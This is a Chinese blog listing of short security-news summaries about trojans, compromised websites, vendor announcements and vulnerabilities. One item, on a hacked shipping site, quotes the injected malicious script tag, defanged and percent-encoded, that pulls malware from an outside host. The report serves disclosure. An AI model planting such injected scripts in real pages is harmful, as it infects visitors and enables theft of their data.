摘要:
今年举行的RSA会议上公布的一项调查显示,使用云计算服务的企业很担心相关安全问题,但是他们并没有对供应商提供的安全性与其所承诺的安全进行对比核查。
这项由Deloitte-Ponemon研究所进行的调查表明,使用云服务的受访者中,大多数都表示他们在与服务供应商的合同中涵盖了安全要求,但是82.6%的受访者表示他们并没有对安全要求进行合规检查的计划。
这个问题是多层次的,关键数据可能会丢失、更改或者盗窃,虽然供应商承诺按照客户要求保护数据,但是如果他们不能按要求保护数据,也不需要承担客户数据的责任。
因此,如果客户的信用卡号码被盗窃,在云中存储这些号码的企业仍然有责任,法律责任仍然是企业的,他. 阅读全文
随笔分类 - [10]Web前端
国家计算机病毒中心发现“网游大盗”新变种
2011-10-08 19:55 by 狼人:-), 126 阅读, 收藏, 编辑
摘要:
国家计算机病毒应急处理中心通过对互联网的监测发现,近期出现“网游大盗”新变种TrojanPSW.OnlineGames.LK,它是一个盗号木马程序,专门盗取网络游戏玩家的游戏账号、游戏密码等信息资料,用户需小心谨防。 反病毒专家说,该变种运行后,会释放一组恶意的动态链接库文件组件(扩展名:dll)到游戏的安装目录下,并将其属性设置为系统或隐藏,并且随游戏的启动而被自动加载运行。变种还会将自身插入到受感染操作系统的浏览器IE和游戏的进程文件中。 一旦插入成功,木马就会通过安装消息钩子等方式窃取网络游戏玩家的账号和密码等个人私密的游戏信息,并将窃取到的信息发送到恶意用户指定的远程服... 阅读全文
微软高层:拟改变支付方式 应对盗版问题
2011-10-08 19:55 by 狼人:-), 160 阅读, 收藏, 编辑
摘要:
“知识产权受到侵犯的情况对我们而言仍然是一个巨大的问题。”昨日来京的微软首席研究及战略官克瑞格·蒙迪表示。
这位被称为“盖茨接班人”的微软高层透露,未来微软将通过改变支付方式等办法遏制盗版猖獗的现象。
他表示微软将改变沿袭多年的“买软件就收费”的方式,在客户端给消费者提供不同的软件支付方式,此外还将加强软件同期的更新服务,从而在技术上遏制盗版。 阅读全文
金山携手PICC探索杀毒软件服务全新模式
2011-10-08 19:55 by 狼人:-), 214 阅读, 收藏, 编辑
摘要:
正在熬夜用本本赶文件,一不小心把手边用来提神的咖啡打翻在本本上,怎么办?出差在外四处奔波,挤火车的时候,电脑包背带断裂,本本跌落在地,液晶屏摔裂了,怎么办?和家人出远门痛快的玩了几天,回到家发现房门被撬,家里的电脑不见了,怎么办?花了不少钱装了套正版专业绘图软件,却十分倒霉,中了病毒,重装得花不少钱,怎么办?
现在大家可以放心,金山毒霸有办法。
近日,金山毒霸联合中国人保财险(PICC)宣布推出金山毒霸电脑保险版,这是一款杀毒软件和电脑保险的组合产品。据了解,人保财险(PICC)为金山毒霸定制的这款保险产品,是国内第一款面对个人用户提供电脑软件和硬件一体保障的保险产品,是国内第一款面对个人用. 阅读全文
卡巴斯基实验室宣布支持多核MIPS64处理器
2011-10-08 19:55 by 狼人:-), 183 阅读, 收藏, 编辑
摘要:
卡巴斯基实验室宣布, 其产品支持Cavium Networks公司出品的 OCTEON II 处理器。Cavium Networks是一家领先的半导体产品提供商,其产品为安全应用程序实现智能进程。
作为Cavium PACE(促进客户终端服务合作商)的成员之一,卡巴斯基实验室将为网络交换平台OEM提供前所未有的软件开发工具(SDK)以及Safestream(安全流扫描)解决方案,为Cavium OCTEON处理器用户提供更为全面、高性能的反恶意软件保护功能。
卡巴斯基反病毒SDK技术具有超高的检测率,可以有效检测并清除各种病毒、木马、蠕虫、间谍软件、广告软件、Rootkit以及各类手机恶意软. 阅读全文
瑞星黄色安全警报:五一严防“酷酷”病毒
2011-10-08 19:55 by 狼人:-), 415 阅读, 收藏, 编辑
摘要:
节假日历来是电脑病毒的高发期,今年的“五一”小长假也不例外。但是今年的“五一”期间,会有一个篡改系统文件,能导致用户电脑系统崩溃甚至蓝屏的恶性病毒发作。
4月28日,瑞星公司发布2009年度第一个黄色安全警报:“酷酷”病毒(Win32.KUKU)会感染exe文件,将在5月1日的X时X分发作(如:10点10分),中毒电脑在当天开机后,桌面上会出现一层黑色的阴影,并且弹出对话窗口:“Hey, Lamer! Say "Bye-bye" to yourdata!”(嘿,弱智,跟你的数据说再见吧!),这时电脑上的EXE文件就会被病毒感染破坏,如果破坏程度严重,则再开机时电脑将无法启动 阅读全文
“假冒hao123”“北大青鸟”被黑 钓鱼挂马两不误
2011-10-08 19:55 by 狼人:-), 841 阅读, 收藏, 编辑
摘要:
据瑞星“云安全”系统统计,4月27日,“ha0123网址之家”、“北大青鸟”、“戴尔常州授权体验中心”等网站被黑客挂马,用户浏览这些网站后,会感染木马病毒:Trojan.DL.Win32.Mnless.dbe(梅勒斯木马),这个木马会从黑客指定网站下载各种木马到用户电脑中偷东西和破坏。
瑞星安全专家提醒说,此次发现的“ha0123网址之家”是假冒“hao123”网站,该网站利用“0”和“o”的显示问题迷惑用户,由于“hao123”网站有大量用户使用,截止发稿时,这些挂马网站中被植入的木马仍存在,所以该钓鱼网站被挂马可能会造成大面积的病毒扩散。网民上网时应安装带有“防挂马”功能的瑞星全功能安全. 阅读全文
周杰伦等名人网站频被挂马 粉丝上网需警惕
2011-10-08 19:55 by 狼人:-), 324 阅读, 收藏, 编辑
摘要:
据瑞星“云安全”系统监测,4月28日,“周杰伦中文网”、“中国保险网”、“玉林百科”等网站被黑客挂马,用户浏览这些网站后,会感染木马病毒:Trojan.DL.Win32.Undef.dyf(安德夫木马下载器),导致用户个人信息被盗。
瑞星安全专家提醒说,近期一些明星大腕儿的个人网站、博客频繁被黑客挂马,27日张韶涵个人网站被挂马到目前为止仍未取消,这些明星具有大批量的忠实粉丝,所以对网民电脑安全带来了较大威胁。
据瑞星“云安全”系统监测,4.28日,互联网上共有70万个网页带有木马活动,342万人次网民遭受攻击。
当日被挂马网站Top5: 1、“玉林百科”:baike.vyu.com.cn.. 阅读全文
卡巴斯基:五一期间谨防“NS下载器”木马程序
2011-10-08 19:55 by 狼人:-), 225 阅读, 收藏, 编辑
摘要:
“五一劳动节”即将到来,从而也为平日紧张工作的人们提供了一个放松神经的“缓冲期”,但这对恶意程序制造者来说,却是其“吸金”的“好”机会。据国际知名信息安全厂商卡巴斯基的病毒监测报告显示,一个名为“NS下载器”木马程序近期处于高危爆发阶段,其可通过可移动存储设备对用户的计算机进行感染,对用户的个人信息安全将在一定程度上带来严重威胁。
据卡巴斯基相关技术人员介绍,NS下载器虽然不是最新的恶意软件,但最近其活跃度有大幅上升。NS下载器通常通过网页挂马的方式感染用户计算机,同时也可以通过可移动存储设备进行感染。一旦感染计算机,它会在用户计算机磁盘上生成大量文件,同时,它还会感染更多用户的个人文件,并. 阅读全文
Adobe新漏洞 金山清理专家急推专补工具
2011-10-08 19:55 by 狼人:-), 152 阅读, 收藏, 编辑
摘要:
4月29日全球最流行办公软件之一AdobeReader再爆漏洞,含有此漏洞的AdobeReader版本分布非常广泛,从8.1.4到9.1的所有版本均有涉及。金山反毒霸专家李铁军指出,由于国内普通网民很少主动修补的特点,将导致该漏洞的影响更为深远。为了避免企业和个人不必要的损失,金山清理专家第一时间推出专补工具。
下载地址:http://cd011.www.duba.net/acd011/syscleaner/hotfix/kspdffix_v2.exe (提示:下载,请在浏览器“地址”栏内复制上面提供的下载网址。)
金山反病毒专家指出,安装AdobeReader之后,可以直接用浏览器点击网.. 阅读全文
微软为美国空军部门打造最安全XP系统
2011-10-08 19:55 by 狼人:-), 257 阅读, 收藏, 编辑
摘要:
北京时间5月2日消息,据美国知名IT杂志《连线》网站报道,微软日前已同美国空军部门签署了一项供货合,今后微软将向美国空军部门提供默认设置“最为安全的”Windows XP操作系统,并提供最为及时的安全升级服务。
《连线》网站称,微软提供给美国空军部门的XP大幅加强了安全性能:600多项默认设置已被锁定而无法修改;微软对XP安全漏洞的常规升级平均期限为57天,而美国空军部门XP的相应期限为72小时。据悉,通过上述修订后,可为美国空军部门节省1亿美元的IT开支及难以估算的技术维护时间。
对于微软是否应该向美国政府和军方部门提供定制版Windows操作系统问题,美国IT界一直存在着争议。赞成这种做. 阅读全文
中国航运网遭遇挂马 黑客悄悄植入病毒
2011-10-08 19:55 by 狼人:-), 178 阅读, 收藏, 编辑
摘要:
中国航运网(hxxp://www.zhongguohangyun.com/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
该网站问题代码: <script src=hxxp://%6D%62%72%33%2E%63%6E></script> hxxp://mbr3.cn/问题框架代码: ... 阅读全文
防范“猪流感”在网络世界传播 警惕垃圾邮件
2011-10-08 19:55 by 狼人:-), 171 阅读, 收藏, 编辑
摘要:
“猪流感”疫情吸引了全球的关注,正当大家探讨该如何有效控制及预防该病毒在全球进一步蔓延之时,赛门铁克安全响应中心却于近日发现了多起针对该事件发起的恶意网络攻击。尽管目前该类攻击的样本数量较少,但赛门铁克认为,这是黑客利用热点事件发起攻击的又一典型案例,并且此类攻击会在今后成为网络钓鱼者、黑客以及垃圾邮件制造者攻击互联网用户的主要手段之一。 目前发现的典型攻击方式包括针对“猪流感”话题的垃圾邮件以及包含恶意代码的恶意软件。例如,赛门铁克在一封邮件中发现了名为“猪流感病毒常见问题”的PDF文档,一旦用户出于好奇心打开该文档,其中的恶意代码便会攻击Adobe程序中旧有的漏洞,从而向用户电脑植入病.. 阅读全文
趋势科技收购加拿大安全公司Third Brigade
2011-10-08 19:55 by 狼人:-), 210 阅读, 收藏, 编辑
摘要:
4月30日消息,趋势科技于前日宣布,该公司将收购加拿大的安全公司Third Brigade,以加速动态资料中心安全策略,此一并购预计于今年第二季完成,趋势并未揭露并购金额。 Third Brigade总部位于加拿大渥太华,是一家提供安全性管理软件的私人企业。
趋势科技CEO陈怡桦表示:“趋势科技成为服务器防护软件先驱暨全球领导厂商已超过十年,这次购并案彰显我们保持此领先地位的承诺,有鉴于动态资料中心已从实体延伸到虚拟,以及公众/私人云端环境,此购并案亦加速我们持续推出更新的创新解决方案与动态资料中心完美搭配。”
趋势科技表示,Third Brigade提供了代管的入侵防禦系统以保护终端用户.. 阅读全文
魔兽争霸自定义地图解释器存在安全漏洞
2011-10-08 19:55 by 狼人:-), 224 阅读, 收藏, 编辑
摘要:
近日,War3自定义地图的解释器Jass虚拟机爆出运行任意代码漏洞,War3自定义地图已经完全有可能携带病毒、木马。
这个漏洞适用于Windows操作系统与Linux操作系统,并适合用于各版本地图。 这意味着,当你运行War3地图时,很可能同时也在运行病毒木马。 除非你是一个代码高手,能看懂所有代码,否则近期还是先不要玩任何非官方的War3地图了。 对于喜爱玩War3的玩家这真的是一个噩耗,看来今后的地图都不安全了。 阅读全文
Windows 7 RC今日开放下载 服务器或不堪重负
2011-10-08 19:55 by 狼人:-), 211 阅读, 收藏, 编辑
摘要:
5月5日消息,据国外媒体报道,Windows 7 RC将于美国时间本周二面向公众开放下载,对于微软服务器而言,这将是个不小的挑战。
4月30日,Windows 7 RC已经交付给MSDN和TechNet用户,而今日将面向公众提供下载。4月30日,很多MSDN和TechNet用户发现,Windows 7 RC下载网站反应迟缓,最后根本无法登录,故障持续了数小时。 对此,微软发言人表示,该故障不是带宽问题,而是过多的下载请求导致SQL Server数据库达到上限。 早在今年1月份,当微软面向公众开放Windows 7 Beta下载时,就已经因为服务器超负荷运转而导致用户无法登录,导致下载服务... 阅读全文
Twitter安全问题接连不断 黑客再次入侵
2011-10-08 19:55 by 狼人:-), 185 阅读, 收藏, 编辑
摘要:
据国外媒体报道,上周三一位网名为“黑客克罗尔”(Hacker Croll)的用户在一家法国技术论坛发帖称,他已成功入侵Twitter,并获得10名Twitter用户账号的控制权。为证明事件真实性,克罗尔还在论坛上贴出了他入侵Twitter用户账号后的13幅截图。 周四下午Twitter联合创始人比兹·斯通(Biz Stone)在Twitter官方博客中证实了该消息,“本周期间,一名外部人员在未经授权情况下访问了Twitter网站。我们初步的评估结果是,没有任何用户账号信息遭到更改或删除,但有10名Twitter个人用户账号信息在这次非授权访问中被他人查看。” 从克罗尔公布的截图来看, 阅读全文
史上最恶毒10大病毒 Conficker排名第八
2011-10-08 19:55 by 狼人:-), 1006 阅读, 收藏, 编辑
摘要:
5月3日消息,据vnunet.com网站报道,美国旧金山的专栏作家伊恩·汤姆森(Iain Thomson)和肖恩·尼古拉斯(Shaun Nichols)发表了他们认为迄今为止最恶毒的10个计算机病毒排行榜。
史上最恶毒10大病毒 1.Creeper Creeper可能是第一个计算机病毒,尽管这种说法还有争议。这个病毒是在1971年由Bob Thomas使用Tenex操作系统制作的。 2.Brain Brain是在1986年年中出现的第一个用微软DOS操作系统制作的病毒。这个病毒是巴基斯坦的两兄弟Basit和 Amjad Farooq Alvi编写的,原来是用于阻止拷贝一个医 阅读全文
MPAA组织遭遇尴尬 网页存在XSS攻击漏洞
2011-10-08 19:55 by 狼人:-), 183 阅读, 收藏, 编辑
摘要:
如果按照MPAA的要求,因特网上任何链接到盗版文件的网站都将被屏蔽,不过这次他们可能要检讨一下自己的网站了,由于很容易遭受XSS攻击,因此他们自己的网站很容易被重定向到海盗湾等有关“盗版”的网站上。 MPAA已经在官司上花费了太多的钱财和精力,以至于他们忽视了自己网站的建设和安全问题,这常常使他们陷入尴尬的境地。比如MPAA的网站就很容易受到来自外界的XSS攻击,这种攻击将可向网站页面中插入图片和各种代码。 一年前,MPAA的网站就曾受到一次类似的攻击,当时整个MPAA页面被清扫一空。RIAA迅速找到了问题所在并在数小时内恢复了页面,不过此时网站被攻击的消息早已是人尽皆知。 MPAA网... 阅读全文
卡巴斯基鼎力支持的成龙“鸟巢”演唱会完美落幕
2011-10-08 19:55 by 狼人:-), 180 阅读, 收藏, 编辑
摘要:
五月一日晚,由国际知名安全厂商卡巴斯基实验室鼎力赞助的卡巴斯基诚献“信心中国”—成龙和他的朋友们大型演唱会在中国国家体育场(鸟巢)火爆上演。能够容纳七万人的国家体育场座无虚席,群星闪耀。演唱会由中国中央电视台节目主持人朱军、凤凰卫视节目主持人陈鲁豫,以及成龙挚友曾志伟、吴大维等联袂主持。在长达两个半小时的精彩演出中,成龙以及百位明星轮番登场,为到场观众共同献上了一场精彩纷呈的视听盛宴。 演唱会表现了信心、爱心、绿色、环保等众多公益主题,巨星成龙还亲身示范提倡环保理念。
值得一提的是,成龙在演唱会上多次对卡巴斯基表示感谢。因为卡巴斯基在得知成龙大哥要做鸟巢开唱第一人并为灾区的孩子做一些事情时.. 阅读全文